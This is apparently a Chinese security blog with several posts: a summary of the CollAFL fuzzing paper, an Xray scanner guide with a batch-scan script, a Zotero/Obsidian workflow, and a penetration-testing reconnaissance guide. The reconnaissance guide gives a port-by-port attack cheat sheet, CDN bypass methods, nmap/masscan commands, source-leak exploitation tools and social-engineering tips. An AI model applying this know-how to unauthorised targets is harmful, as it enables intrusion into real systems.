WhiteRabbit的博客

CollAFL_在提高代码覆盖精确度背景下优化漏洞挖掘效果

2023-03-12T12:08:32.000Z

这是一篇来自于IEEE TDSC的文章分享，文章名为《Path Sensitive Fuzzing for Native Applications》。其关注点是模糊测试中代码覆盖这一环节的精确度，由此进一步去提高模糊测试的准确性。

浅谈背景信息

模糊测试经过长时间的发展，逐渐形成了适合不同领域的模糊策略，其中最为普适且有着较好测试效果的当属基于覆盖引导的模糊测试，其根据代码覆盖率对种子调度进行指导，切合实际测试效果给出指导，在很多领域均取得极佳的漏洞挖掘效果。但是基于覆盖引导的模糊测试受制于仪器开销等物理因素、执行路径爆炸等理论因素，得到的多为粗略覆盖信息。此处仅以最常见的AFL为例，AFL采用一张存有边命中数量的紧凑位图，通过静态分析获取覆盖率信息，但是随机生成的哈希算法却有可能时两条不同的边具有相同的哈希值，这就会知道在位图中二则的记录相同，如此统计出来的覆盖率精度必然有所损失。

考虑到AFL技术作为最基础的模糊测试技术，对各种现实程序有着较好的适应效果。本文在AFL技术的基础上对其在哈希冲突方面的问题进行优化，并由此引申出三种全新的模糊策略，这些在精度提高的覆盖信息上有着很好的效果。本文的贡献有以下几点：

01 证实了哈希冲突对于边覆盖信息的精确度有着极大的影响。

02 设计出解决哈希冲突的算法，同时保持低开销，高精度。

03 在提高了覆盖信息的精确度后，提出了新的模糊测试策略。

04 在本文的方法上衍生出两个变体，用于测试无源码的测试程序。

分析如今代码覆盖准确率低的源头何在

覆盖引导的模糊器其漏洞挖掘效果很大程度上受到覆盖信息准确度的影响。由于在现实程序中跟踪所有路径覆盖时不可行的，主流方法主要考虑跟踪基本块覆盖率及边覆盖率。但是由边覆盖可以推导出块覆盖，反之则不然。

如图所示，两个程序P1和P2,他们共享大部分边，但是其在函数foo中的子路径不同，他们的块覆盖完全相同，但是其边覆盖不同，比如其中的B1→C1仅存在于路径P1中。

因此本文的主要思想还是建立在考虑边覆盖来标识覆盖信息上，而主流的使用边覆盖的方法AFL，却面临着哈希冲突带来的覆盖信息误差大的问题。

哈希冲突问题的根源在于AFL在使用位图来跟踪应用程序边覆盖的时候，边使用随机的哈希值来标识，但是由于算法的随机性，两条不同的边可能具有相同的哈希值，这使得模糊器无法区分这样的两条边，最终导致覆盖信息不准确。

一直以来，AFL技术的显著漏洞挖掘效果，掩盖了其中覆盖信息精度极低的问题，甚至由部分程序，边碰撞率高达70%以上，提高覆盖信息精度给漏洞挖掘工作带来的收益是极大的。

为解决哈希冲突问题而具体情况具体分析

现实程序中的基本块一般可分为三类，根据其前置块（precedent）的数量先分为由多个前置块和单个前置块两种，再对多个前置块进行接下来的分析做进一步区分。之所以根据前置块数量区分，是由于从哈希算法给边分配哈希值的角度触发，对于多前置块，即多条如边的块，其处理方式与单前置块，单入边的块处理方式不同。

公式中的关键在于x,y,z三个参数的选取，其中y值同一程序取值相同，而x，z的值则通过遍历的方法，其判断条件为所有多前置块的基本块其参数选取均不同，在此基础之上，可以保证所有边的散列值不同，从而缓解哈希冲突问题。其伪代码如下。

如代码中显示，在选取参数时采用贪婪算法实现，但是其中会存在不可解析块，对此，在为其设计有针对性的哈希值分配方法。

这里需要注意的是，不可解析的块的参数分配是在可解析块结束后，构建一个哈希表，表中会筛选掉可解析快已经使用的哈希值，转而从未使用的哈希中选取唯一的哈希值给以不可解析快结尾的边，这一步操作均可在离线状态下完成，降低实验的时间开销。其思想如下图。

至此，所有多前置块都已被处理殆尽，还剩下的单前置块，这里根据前置操作中构造的Freehashes表获取此时位图中还剩下的哈希值，赋给剩下的但前置块，这一步也可以通过离线操作完成。

三类基本块的处理方法中，由多前置块的基本块解析操作，遍历寻求参数均需要较大的开销，最终三者的时间开销方面。

cost(Fhash) > cost(Fmul) > cost(Fsingle) ≈ 0

但是在现实程序中，三者的数量却区别极大，其中绝大多数为但前置块的Fsingle算法，一部分多前置块，可解析的Fmul算法，而剩下的Fhash算法对应的不可解析多前置块的情况只有极少数，几乎可以忽略不计，这也使得其带来的高昂计算成本在现实程序中的影响不大。

高精度覆盖信息所带来的全新模糊策略

在拥有了准确的代码覆盖信息后，本文提出以下三个全新的模糊测试策略：

1.对于一条路径，倘若有多个未被探索的分支，那么对该路径的突变可能会探索那些分支。

2.对于一条路径，倘若其未被探索的分支有多个后代，那么对该路径突变有可能会探索那些后代。

3.考虑到最终目标是提高漏洞挖掘效率，那如果一个路径有多次内存访问操作，对其突变可能触发潜在的内存相关崩溃，漏洞。

基于这样的三个思想，从以下三个角度提出全新的模糊策略。

（一）其执行路径有着多个未覆盖分支的种子

这里会给予那些未覆盖分支以权重，通过加权的方式来衡量这些种子提高代码覆盖，探索未覆盖领域的能力。此方法记为CollAFL-br。

图中IsUntouched()的值将根据边是否被覆盖表示为0（未覆盖）或1（已覆盖）。

（二）对于未覆盖分支的后代对提高代码覆盖的影响。

这里需先统计种子执行路径下的未覆盖分支，随后根据这些分支计算其后代的数量。

这个方法标识未CollAFL-Desc，其计算的权重Weight_Desc()是一个动态结果，其具体值随着模糊测试过程中，未覆盖边IsUntouched()值的变化而变化，但是考虑到每个未覆盖块的后代数量是确定的，这一步计算为静态值，即

该计算可以在离线情况下完成。

（三）关于高内存访问在漏洞挖掘中的影响。

这里从种子执行路径中，内存访问次数为加权目标，计算其是否有希望发现内存漏洞，之所以这里着重强调内存相关漏洞，是由于在历史研究中表明，内存相关漏洞在总的漏洞中占比较高。

具体实验来论证文章观点

实验选择了24个开源Linux应用程序的最新版本，包括主流工具，图像处理库，音频视频处理工具，文档处理工具等，主要参考要素是其在社区中受欢迎程度，发展活跃度。此外还对带有4个设置好漏洞的LAVA-M数据集进行评估。

实验中对CollAFL和其三种不同模糊策略-br，-desc，-mem都进行了评估。实验中设置的虚拟机使用2 GHz Intel CPU和1GB RAM，Ubuntu版本为15.10.

哈希冲突对覆盖信息准确率的影响有多少

AFL在计算边命中信息时，采用的位图默认为64KB大小，对于哈希冲突问题，传统想法有扩大位图从而减小边碰撞概率，事实上，扩大位图确实在一定程度上缓解了碰撞问题。

如图，在位图扩大到1MB以后，边碰撞比已经是一个较低的状态。但是需要注意的是，模糊器在获取到覆盖信息后，准备进行下一步指导种子调度等操作时，需要去查询位图获取边命中情况，这里就需要对位图进行遍历，倘若贸然地扩大位图，这给模糊器每次访问带来的时间开销将会是几何级增长。

显然，在位图扩大的过程中，所有程序的执行速度均大幅度下降，对比降低边碰撞比的收益和其带来的巨额时间开销，简单扩大位图的操作，是一种低收益的操作。哈希冲突对于代码覆盖精度的影响不能简单通过扩大位图去改善。

本文提出的CollAFL技术在代码覆盖方面的表现

如图所示，200个小时内，不同模糊器在11个应用程序上的探索路径总数上，CollAFL平均多找到了9.9%的路径，其中尤其是考虑未覆盖分支的模糊策略-br，其平均多发现了20.78%的路径。而和相对比AFL-fast，即优先考虑低访问次数的路径，CollAFL表现出更优的路径覆盖率，平均多找到8.45%的路径。

CollAFL在发现独特崩溃方面的能力

除了代码覆盖率，漏洞挖掘的效果很大程度上也要取决于特殊崩溃的发现，进而联系到发现的漏洞数量，二者大体是正相关的。

从图中发现，以所有模糊器发现崩溃数的平均值为基线，CollAFL对比AFL和AFL-fast均有更优表现。其中最突出的两条，表明CollAFL衍生出的新模糊策略在一些具体的程序上有着特别优秀的表现。

最终该方法确定了157个漏洞，这些漏洞在提交给开发者后均证实为程序存在的问题。

面对现实程序的随机性表现如何

在衡量测试随机性时，选择对同一程序进行20次漏洞挖掘，分析其中多少次发现了漏洞，耗时多久，由此判断测试方法应对现实程序的测试随机性如何。

在测试程序中，Exiv2的随机性最大，在其上的测试中CollAFL仍优于AFL技术，除了意外，多数程序上，CollAFL技术均能实现20此实验全部或基本上都挖掘到漏洞，且用时也较短。

结论

本文研究了覆盖引导模糊器中覆盖误差的负面影响。我们提出了一种覆盖敏感模糊解决方案CollAFL，它解决了最先进的fuzzer AFL中的散列冲突问题，在保持低仪器开销的同时实现更准确的边缘覆盖信息。本文还提出三种模糊策略，经实验证明效果更优。

扫描工具Xray使用方法

2022-12-30T10:39:32.000Z

当我们需要寻找一个网站的漏洞时，自动化漏洞扫描工具XRAY是一个不错的选择，省时省力，还可以通过编写代码实现对批量网站的自动扫描。

1. XRAY简介

根据官方文档介绍，XRAY目前支持的漏洞检测类型包括:

XSS漏洞检测 (key: xss)

SQL 注入检测 (key: sqldet)
命令/代码注入检测 (key: cmd-injection)
目录枚举 (key: dirscan)
路径穿越检测 (key: path-traversal)
XML 实体注入检测 (key: xxe)
文件上传检测 (key: upload)
弱口令检测 (key: brute-force)
jsonp 检测 (key: jsonp)
ssrf 检测 (key: ssrf)
基线检查 (key: baseline)
任意跳转检测 (key: redirect)
CRLF 注入 (key: crlf-injection)
Struts2 系列漏洞检测 (高级版，key: struts)
Thinkphp系列漏洞检测 (高级版，key: thinkphp)
POC 框架 (key: phantasm)

大至 OWASP Top 10 通用漏洞检测，小至各种 CMS 框架 POC，均可以支持。并且作为为一款安全辅助评估工具，而不是攻击工具，内置的所有 payload 和 poc 均为无害化检查。还可以通过配置文件对功能进行定制。扫描结果有四种输出方式，分笔试屏幕输出、JSON文件输出、HTML报告输出和Webhook输出。

2. 运行

XRAY提供了三种扫描模式，分别是代理模式、基础爬虫模式和服务模式，每种扫描模式各有优劣，选择适合自己需求的扫描模式使用即可。

2.1 代理模式扫描

当XRAY作为浏览器代理进行工作时，它会作为中间人将浏览器的请求和服务器的响应原样转发，但会记录下浏览器的访问对象，对访问对象进行漏洞扫描工作。

若浏览器使用https协议进行通行，我们首先应配置CA证书，获取浏览器的信任后才可作为代理工作。XRAY有自动生成CA证书的命令。

1	.\xray_windows_amd64.exe genca

获取CA证书后，依照自己使用的浏览器，进行证书添加即可。添加完证书后，不要忘记对浏览器进行相应的代理配置。准备工作完成后，输入下方命令即可运行XRAY代理。

1	.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output xray-testphp.html

开启运行后，XRAY就会对我们使用浏览器访问的网页进行自动扫描了。

2.2 基础爬虫模式扫描

爬虫模式与代理模式的不同之处在于，在命令行输入需要扫描的对象即可进行扫描，与编程语言结合使用时，还可实现对批量网站的自动化后台扫描。但该模式有一个缺点，不能处理js渲染的页面。

运行爬虫模式的命令为：

1	./xray_windows_amd64 webscan --basic-crawler http://testphp.vulnweb.com/ --html-output xray-crawler-testphp.html

2.3 服务模式扫描

XRAY的常用功能是web扫描，但其在逐渐研发服务扫描的相关能力，目前主要是服务扫描相关的 poc。目前只有一个 tomcat-cve-2020-1938 ajp 协议任意文件检测 poc。

目前支持两种扫描方式，分别问检测单个目标和批量检测文件中的多个目标：

1 2	./xray servicescan --target 127.0.0.1:8009 ./xray servicescan --target-file 1.file

3. 实现批量自动扫描

这里为大家介绍使用PYTHON编写自动扫描脚本的方法

import pandas as pd
import subprocess
def xray(host):
    
    # 将域名作为HTML输出文件的文件名，存储该网站链接的扫描结果
    # 使用subprocess.Popen方法创建子程序执行XRAY命令
    # 调用wait方法，一次只扫描一个网站链接，可根据性能对并发度进行调整
    name = host.replace('https://', '').replace('http://', '').replace('/', '')
    cmd = ["xray", "webscan", "--basic-crawler"]
    cmd += [host]
    cmd += ["--json-output", name]
    p = subprocess.Popen(cmd)
    p.wait()
if __name__ == "__main__":
    # 读取data文件，提取data文件中的网站链接
    # 对每一个网站链接，执行相应的xray扫描命令，扫描模式为基础爬虫模式
    xlsx = pd.ExcelFile(r'data.xlsx')
    sheet1 = pd.read_excel(xlsx, 'Sheet1')
    for host in sheet1['网站链接']:
        xray(host)
    xlsx.close()

科研工作流

2022-11-09T10:39:32.000Z

老白兔今天总结一下自己论文查找、阅读、记录的工作流。主要包含三部分内容：

文献管理：使用Zotero管理文献
文献阅读：在Windows平台上实现Zotero与笔记应用Obsidian跨应用联动
数据跨平台同步：文献PDF文件与Obsidian笔记在Windows, iOS, Android全平台同步

1. 使用Zotero管理文献

Zotero是一个免费开源的文献管理工具，可以轻松地收集、管理、阅读和引用文献。

Zotero的功能可以参考：Zotero的操作指南

1.1 Zotero文献收集

Zotero有三种文献收集方式：

导入已下载在本地的PDF文件
输入文献DOI自动获取文献PDF文件
使用浏览器插件Zotero Connector自动导入当前网页中的文献

Zotero自动导入文献后，会自动解析PDF元数据，提取标题、作者、摘要等信息。

1.2 Zotero文献管理

随着论文愈看愈多，为了解决大量PDF文件的管理问题，Zotero提供了Collection功能。实际上就类似于在文件管理系统中创建文件夹，将一个个文献归入相关文件夹中。Zotero的优势就是支持引用，允许一个文献归入多个不同Collection中。

如果只是Collection功能完全不够，还需要辅以ZotFile插件，在配置后可以自动根据配置重命名、移动文件，使用WebDav实现跨平台同步。

使用ZotFile自动组织PDF文件可以参考：zotero文献管理器插件：ZotFile的安装和使用

两个小建议：

文件组织：使用Collection层级关系作为PDF文件的相对路径
重命名：使用年份+文章标题为PDF文件重命名

看官可能不禁产生疑问，为什么要使用ZotFile对文献重新组织、重命名呢？不做这一步操作依旧可以正常使用Zotero原生的Collection功能进行文献管理与阅读。
如果只在一台电脑上工作，没有多主机、跨平台同步，确实Collection就够了。但如果需要台式机、笔记本多主机同步文件，手机、平板以至于Web端跨平台阅读，Zotero默认的杂乱无章的文件组织方式就满足不了需求了。
借助ZotFile，自动使用文件夹对PDF文件的组织方式进行重组，方便在不同应用中查找、阅读。

1.3 PDF文件的跨平台同步

辛辛苦苦在ZotFile上配置文件组织、重命名规则，就是为了这一步文件跨平台同步。

其主要原理就是支持WebDav协议的客户端和支持WebDav协议的云存储服务商之间，通过WebDav协议进行通信，实现文件的存储和下载。在Zotero中，由ZotFile插件实现对WebDav协议的支持。

使用坚果云作为云存储服务商的解决方案可以参考：Zotero+坚果云WebDAV实现跨平台同步

以上，成功将本地文献同步至支持WebDav协议的云盘中。接下来就是使用另一个平台上的支持WebDav协议的客户端，将云盘中的文献同步到本地使用。

可以是另一台Windows主机上的坚果云客户端，实现不同主机上的无缝同步。
可以是iPad上的PDF Expert（PDF Expert打开坚果云里的文件），在iPad上阅读文献。
可以是Android上的WPS（WPS打开坚果云里的文件），在手机上阅读文献。

三个小建议：

坚果云免费空间太小，可以使用Koofr的云存储服务，免费空间充足。
Android端只是偶尔进行文献阅读，没有PDF标注数据同步的需求，可以使用Koofr自身所提供的Android客户端，下载之后使用相应阅读器打开。
iPad上会对PDF进行标注，使用PDF Expert通过WebDav协议连接Koofr，实现标注信息的实时同步。

2. Zotero与Obsidian的梦幻联动

上一节实现了使用Zotero随时随地，使用任何设备阅读文献。但阅读过程中不可避免的会想要对文献进行标注、关联，输出笔记、思维导图。随着阅读文献数量的增加，想要将具有某一相同主题的不同文献关联在一起，构建文献的知识图谱。作为MarginNote的重度用户，对于其点击引用直接跳转回原文的功能爱得深沉。

那么，有没有一款应用能支持一键导出Zotero中的笔记，支持构建知识图谱，支持点击引用跳转回Zotero中原文？答案是Obsidian。

用一句话描述Obsidian：支持双链的Markdown文件编辑、管理平台。其功能可以参考：Obsidian是什么以及它能用来做什么。

如果只看其原生功能，也就双链功能可以解决我构建知识图谱的痛点。但是，同Zotero一样，其强大之处在于其让人眼花缭乱的插件支持。

如何使Obsidian与Zotero联动起来，像MarginNote般丝滑，参考：Zotero和Obsidian联动最优解决方案以及最优解决方案的配置指南。

3. Obsidian笔记跨平台同步

上一节实现Obsidian与Zotero的联动，但一想到文献的跨平台阅读，我们不禁又想拥有笔记的跨平台阅读。好在Obsidian拥有全平台客户端，现在的问题只是如何在不同平台上同步Markdown文件。

Markdown本身作为纯文本文件，使用Git进行版本控制、跨平台同步，pull到本地之后用Obsidian客户端打开即可。

Github 创建私有仓库
Windows 上将Obsidian的Vault文件夹push到本地仓库中
Android 上使用spck editor作为git客户端拉取文件，使用Obsidian打开仓库
iOS设备上使用iSH作为git客户端，使用mount指令实现多应用间共享文件夹，参考iOS上使用iSH的git同步obsidian

4. 总结

各平台工作流支撑软件汇总：

Windows: Zotero, Obsidian, Koofr, Git
Android: Koofr, Spck Editor, Obsidian
iOS: PDF Expert, iSH, Obsidian
Cloud: Github, Koofr

信息收集

2022-10-21T09:39:32.000Z

信息收集对于渗透测试前期来说是非常重要哒！！！信息收集得够全面，后面的工作就更轻松，最近整理了关于信息收集流程，收集内容以及常用网站、工具，希望对大家有帮助~有需要补充的地方欢迎留言！！！

1.信息收集流程

1、厂商信息收集：

whois、启信宝、天眼查、域名备案、服务供应商、第三方厂商系统

2、资产归属判断：

whois、备案信息、域名证书、数字签名、logo、title

3、资产收集维度：

WEB、APP、PC客户端、微信公众号、微信小程序、支付宝小程序、QQ、钉钉、企业微信、微信群、QQ群

4、资产收集内容：

子域名、IP、C段、旁站、WEB路径、参数名、文件名、协议、数据包类型、邮箱、ID、用户名、密码、手机号、员工工号、重要系统密码规则、身份证号、企业资质证书、法人信息

2.企业信息

启信宝

天眼查

收集内容：

企业规模、投资关系
微信公众号、微博、备案站点、软件著作权、产品
高管信息

启信宝

3.收集域名信息

3.1Whois查询

Whois 简单来说，就是一个用来查询域名是否已经被注册，以及注册域名的详细信息的数据库（如域名所有人、域名注册商、域名注册日期和过期日期、DNS等）。通过域名Whois服务器查询，可以查询域名归属者联系方式，以及注册和到期时间。

3.2备案信息查询

国内网站注册需要向国家有关部门申请备案，防止网站从事非法活动，而国外网站不需要备案。

还可通过备案信息反查兄弟域名。

3.3真实IP查询

绕过CDN查找真实IP方法,参考链接：https://www.cnblogs.com/qiudabai/p/9763739.html

验证是否存在CDN

方法一：很简单，使用各种多地 ping 的服务，查看对应 IP 地址是否唯一，如果不唯一多半是使用了CDN，多地 Ping 网站有：
http://ping.chinaz.com/
http://ping.aizhan.com/
http://ce.cloud.360.cn/

方法二：使用 nslookup 进行检测，原理同上，如果返回域名解析对应多个 IP 地址多半是使用了 CDN。

有 CDN 的示例：
www.163.com
服务器: public1.114dns.com
Address: 114.114.114.114
非权威应答:
名称: 163.xdwscache.ourglb0.com
Addresses: 58.223.164.86
125.75.32.252
Aliases: www.163.com
www.163.com.lxdns.com
无 CDN 的示例：
xiaix.me
服务器: public1.114dns.com
Address: 114.114.114.114
非权威应答:
名称: xiaix.me
Address: 192.3.168.172

解决方法

方法一:查询历史DNS记录（推荐）

查看 IP 与 域名绑定的历史记录，可能会存在使用 CDN 前的记录，相关查询网站有：
https://dnsdb.io/zh-cn/ ###DNS查询
https://x.threatbook.cn/ ###微步在线
http://toolbar.netcraft.com/site_report?url= ###在线域名信息查询
http://viewdns.info/ ###DNS、IP等查询
https://tools.ipip.net/cdn.php ###CDN查询IP

方法二:查询子域名

方法三：网络空间引擎搜索法（推荐）

常见的有以前的钟馗之眼，[shodan](https://www.shodan.io/)，[fofa搜索](https://fofa.so/)。以fofa为例，只需输入：title:“网站的title关键字”或者body：“网站的body特征”就可以找出fofa收录的有这些关键字的ip域名，很多时候能获取网站的真实ip。

方法四:利用SSL证书寻找真实原始IP

方法五:利用HTTP标头寻找真实原始IP

方法六:利用网站返回的内容寻找真实原始IP

方法七:使用国外主机解析域名

方法八:网站漏洞查找

1
2
3

1）目标敏感文件泄露，例如：phpinfo之类的探针、GitHub信息泄露等。
2）XSS盲打，命令执行反弹shell，SSRF等。
3）无论是用社工还是其他手段，拿到了目标网站管理员在CDN的账号，从而在从CDN的配置中找到网站的真实IP。

3.4IP反查绑定的域名网站

IP关联域名，大部分网站一个IP多个域名

4.子域名收集

4.1在线平台

第三方平台查询（推荐）

主要是一些第三方网站和一些博主提供的服务

ip138（推荐）
站长工具
hackertarget
phpinfo（在线爆破）
t1h2ua（在线爆破）
dnsdumpster
zcjun（在线爆破）

权重综合查询

全国政府网站基本数据库

Address Link

5.收集主机信息

5.1常用的端口利用及解析总结

端口：21 服务：FTP/TFTP/VSFTPD 总结：爆破/嗅探/溢出/后门
端口：22 服务：ssh远程连接      总结：爆破/openssh漏洞
端口：23 服务：Telnet远程连接   总结：爆破/嗅探/弱口令
端口：25 服务：SMTP邮件服务     总结：邮件伪造
端口：53 服务：DNS域名解析系统   总结：域传送/劫持/缓存投毒/欺骗
端口：67/68 服务：dhcp服务      总结：劫持/欺骗
端口：110 服务：pop3              总结：爆破/嗅探
端口：139 服务：Samba服务         总结：爆破/未授权访问/远程命令执行
端口：143 服务：Imap协议         总结：爆破161SNMP协议爆破/搜集目标内网信息
端口：389 服务：Ldap目录访问协议 总结：注入/未授权访问/弱口令
端口：445 服务：smb              总结：ms17-010/端口溢出
端口：512/513/514 服务：Linux Rexec服务 总结：爆破/Rlogin登陆
端口：873 服务：Rsync服务                 总结：文件上传/未授权访问
端口：1080 服务：socket                  总结：爆破
端口：1352 服务：Lotus domino邮件服务   总结：爆破/信息泄漏
端口：1433 服务：mssql                  总结：爆破/注入/SA弱口令
端口：1521 服务：oracle       总结：爆破/注入/TNS爆破/反弹shell2049Nfs服务配置不当
端口：2181 服务：zookeeper服务            总结：未授权访问
端口：2375 服务：docker remote api    总结：未授权访问
端口：3306 服务：mysql                 总结：爆破/注入
端口：3389 服务：Rdp远程桌面链接        总结：爆破/shift后门
端口：4848 服务：GlassFish控制台       总结：爆破/认证绕过
端口：5000 服务：sybase/DB2数据库      总结：爆破/注入/提权
端口：5432 服务：postgresql             总结：爆破/注入/缓冲区溢出
端口：5632 服务：pcanywhere服务        总结：抓密码/代码执行
端口：5900 服务：vnc                     总结：爆破/认证绕过
端口：6379 服务：Redis数据库           总结：未授权访问/爆破
端口：7001/7002 服务：weblogic         总结：java反序列化/控制台弱口令
端口：80/443 服务：http/https         总结：web应用漏洞/心脏滴血
端口：8069 服务：zabbix服务            总结：远程命令执行/注入
端口：8161 服务：activemq             总结：弱口令/写文件
端口：8080/8089 服务：Jboss/Tomcat/Resin 总结：爆破/PUT文件上传/反序列化
端口：8083/8086 服务：influxDB         总结：未授权访问
端口：9000 服务：fastcgi                 总结：远程命令执行
端口：9090 服务：Websphere             总结：控制台爆破/java反序列化/弱口令
端口：9200/9300 服务：elasticsearch   总结：远程代码执行
端口：11211 服务：memcached             总结：未授权访问
端口：27017/27018 服务：mongodb         总结：未授权访问/爆破

5.2扫描工具

Masscan

项目地址：https://github.com/robertdavidgraham/masscan

Masscan主要是真对全网进行端口扫描

1
2
3

masscan --ping 192.168.1.0/24 --rate 10000
masscan -iL tmp_scanip_list.tmp -p1-65535 -Pn -v --randomize-hosts --banners -oX result.xml --rate 10000

Nmap

项目地址：https://github.com/nmap/nmap.

扫描存活主机

-sL 列出要扫描的ip

-sn 不进行端口扫描

-Pn 将所有主机都默认为在线，跳过主机发现

-PS/PA/PU/PY 使用TCP、SYN/ACK、UDP或SCTP协议去发现端口

-PE/PP/PM：使用ICMP响应（echo）、时间戳或子网掩码请求来发现探测

-P0 不使用IP协议的ping

-n 不做DNS解析

-R 总是做DNS反向解析

--dns-servers指定自定义的DNS服务器

--system-dns 使用操作系统的DNS

--traceroute 追踪每台主机的跳转路径

1
2
3

nmap -sP 192.168.123.1/24    //ping扫描
nmap -p0 192.168.123.1/24    //无ping扫描
nmap -PS 192.168.123.1/24    //TCP Syn Ping扫描

推荐命令

1	nmap -sC -v -A IP -p PORT -oN result.txt

常用命令

nmap -p- -Pn -sV -v -open -T4 -n -sS -O x.x.x.x
-p- 扫描全端口
-Pn 不ping扫描
-sV 扫描版本信息
-v  显示扫描过程
--open 只显示开放端口
-T4 设置时序模板为自动控制
-n  不进行dns解析
-sS SYN半连接扫描
-O 扫描操作系统

快速扫描所有端口：

1	nmap -sS -p 1-65535 -v 192.168.99.177

Masscan+Nmap

有些时候网站的入口点属于非常规端口，因此是必须要做全端口扫描，做全端口扫描的时候由于namp发包量大经常出现各种问题，如端口扫描不全、获得信息不准等等，为了解决上述问题，这里提供一个masscan+nmap结合的方式进行快速扫描。

原理：使用masscan做全端口开放检测，检测出来端口信息后，用nmap进行服务信息识别。

使用：终端输入以下命令执行即可

# masscan --ping 192.168.1.0/24 --rate 10000
  nmap -sP 192.168.1.0/24
# masscan 192.33.6.145 -p1-65535  --rate 1000 -oL ports
# ports=$(cat ports | awk -F " " '{print $3}' | sort -n | tr '\n' ','  | sed 's/,$//' | sed 's/^,,//')
# nmap -sV -p $ports 192.33.6.145
  nmap -sC -v -A IP -p PORT -oN result.txt

masnmapscan

项目地址：https://github.com/hellogoldsnakeman/masnmapscan-V1.0

masnmapscan整合了masscan和nmap两款扫描器，masscan扫描端口，nmap扫描端口对应服务，二者结合起来实现了又快又好地扫描。并且加入了针对目标资产有防火墙的应对措施。

Zmap

项目地址：https://github.com/zmap/zmap

Zmap主要是真对全网进行端口扫描

6.指纹识别

Web指纹识别技术研究与优化实现：https://www.anquanke.com/post/id/178230 常见指纹检测的对象

1、CMS信息：比如大汉CMS、织梦、帝国CMS、phpcms、ecshop等；
2、前端技术：比如HTML5、jquery、bootstrap、pure、ace等；
3、Web服务器：比如Apache、lighttpd, Nginx, IIS等；
4、应用服务器：比如Tomcat、Jboss、weblogic、websphere等；
5、开发语言：比如PHP、Java、Ruby、Python、C#等；
6、操作系统信息：比如linux、win2k8、win7、kali、centos等；
7、CDN信息：是否使用CDN，如cloudflare、360cdn、365cyd、yunjiasu等；
8、WAF信息：是否使用waf，如Topsec、Jiasule、Yundun等；
9、IP及域名信息：IP和域名注册信息、服务商信息等；
10、端口信息：有些软件或平台还会探测服务器开放的常见端口。

指纹识别

在漏洞挖掘中，对目标服务器进行指纹识别是相当有必要的，因为只有识别出相应的Web容器或者CMS，才能查找与其相关的漏洞，然后才能进行相应的渗透操作。

CMS (Content Management System)又称整站系统或文章系统。常见的CMS有Dedecms (织梦)、Discuz、 PHPWEB、 PHPWind、PHPCMS、ECShop、 Dvbbs、 SiteWeaver、 ASPCMS、帝国、Z- Blog、WordPress等。

第三方平台

工具

常用指纹识别工具有：御剑Web指纹识别、WhatWeb、Test404轻量CMS指纹识别+v2.1、椰树等，可以快速识别一些主流CMS

Github项目

7.收集敏感信息

7.1敏感信息收集网站

网盘搜索：http://www.pansou.com/ 或 https://www.lingfengyun.com/
网盘密码破解：https://www.52pojie.cn/thread-763130-1-1.html
社工信息泄露：https://www.instantcheckmate.com/、http://www.uneihan.com/
源码搜索：https://searchcode.com/、https://gitee.com/、https://gitcafe.com、https://code.csdn.net
钟馗之眼： https://www.zoomeye.org/
天眼查： https://www.tianyancha.com/ 这个有破解使用企业版查询的办法
佛法：https://fofa.so/ 帮助文档：https://fofa.so/help
微步在线：https://x.threatbook.cn/
360情报中心：https://ti.360.cn/
在线查毒：https://www.virustotal.com/l

7.2目录&后台扫描

常用工具

7kbscan
https://github.com/7kbstorm/7kbscan-WebPathBrute
DirMap
https://github.com/H4ckForJob/dirmap
dirsearch
https://github.com/maurosoria/dirsearch
Fuzz-gobuster
https://github.com/OJ/gobuster
Fuzz-dirbuster
OWASP kali自带
Fuzz-wfuzz
https://github.com/xmendez/wfuzz
Test404轻量后台扫描器+v2.0
御剑
破壳Web极速扫描器

个人比较喜欢使用Fuzz大法，不管是目录扫描、后台扫描、Web漏洞模糊测试都是非常灵活的。这几款fuzz工具都比较好用

1
2
3

基于Go开发：gobuster
基于Java开发：dirbuster
基于Python开发：wfuzz

kali默认字典目录： /usr/share/wordlists/

7.3源码泄露

常见源码泄露

/.bzr/
/CVS/Entries
/CVS/Root
/.DS_Store  MacOS自动生成
/.hg/
/.svn/ (/.svn/entries)
/.git/
/WEB-INF/src/
/WEB-INF/lib/
/WEB-INF/classes/
/WEB-INF/database.properties
/WEB-INF/web.xml
Robots.txt

上述源码泄露在Github上都可以找到相应的利用工具

A 网页扫描

通过扫描器扫描web站点，看是否有源码相关目录被泄漏，如有，再通过特殊工具恢复

工具如：破壳web扫描器、御剑扫描器

B github类信息泄漏

GitHub敏感信息泄露一直是企业信息泄露和知识产权泄露的重灾区，安全意识薄弱的同事经常会将公司的代码、各种服务的账户等极度敏感的信息『开源』到github中，github也是黑、白帽子、安全工程师的必争之地。

全自动监控github：https://sec.xiaomi.com/article/37
GitHub敏感信息泄露监控：GSIL、Github-Monitor
在GitHub中一般通过搜索网站域名、网站JS路径、网站备案、网站下的技术支持等进行敏感信息查询

C 社工方式收集

还可以在QQ群备注或介绍等，甚至混入企业qq工作群查找，这设计社工范畴了

D 源码泄露利用工具

.git源码泄露：https://github.com/lijiejie/GitHack
.DS_Store泄露：https://github.com/lijiejie/ds_store_exp
.bzr、CVS、.svn、.hg源码泄露：https://github.com/kost/dvcs-ripper

7.4备份文件泄露

备份文件泄露常见名称

backup
db
data
web
wwwroot
database
www
code
test
admin
user
sql

备份文件泄露常见后缀

.bak
.html
_index.html
.swp
.rar
.txt
.zip
.7z
.sql
.tar.gz
.tgz
.tar

备份文件泄露扫描工具

常见扫描工具有：

Test404网站备份文件扫描器 v2.0(win)
ihoneyBakFileScan(python)
ihoneyBakFileScan v0.2 多进程批量网站备份文件泄露扫描工具，根据域名自动生成相关扫描字典，自动记录扫描成功的备份地址到文件

地址：https://github.com/sry309/ihoneyBakFileScan

8.搜索引擎&情报社区

8.1GoogleHacking常用语法

intitle 搜索网页标题中包含有特定字符的网页。
例如intitle: cbi，这样网页标题中带有cbi的网页都会被搜索出来
inurl 搜索包含有特定字符的URL。
例如inurl:cbi，则可以找到带有cbi字符的URL
intext 搜索网页正文内容中的指定字符。
例如intext:pdf。这个语法类似我们平时在某些网站中使用的“文章内容搜索”功能
Site 找到与指定网站有联系的URL。
例如Site:www.58.com。所有和这个网站有联系的URL都会被显示
减号- 要求搜索结果中不含特定查询词
例如intitle:小说 - 电视剧 只会搜到小说而不会出现电视剧
domain 查找跟某网站相关的信息
例如domain:www.google.com查询在网站内容里面包含www.google.com的信息的网站
filetype 限制查找文件的格式内容
关键字+filetype:文件格式,例如电脑 + filetype:ppt
双引号,书名号,中括号精确匹配,缩小搜索范围
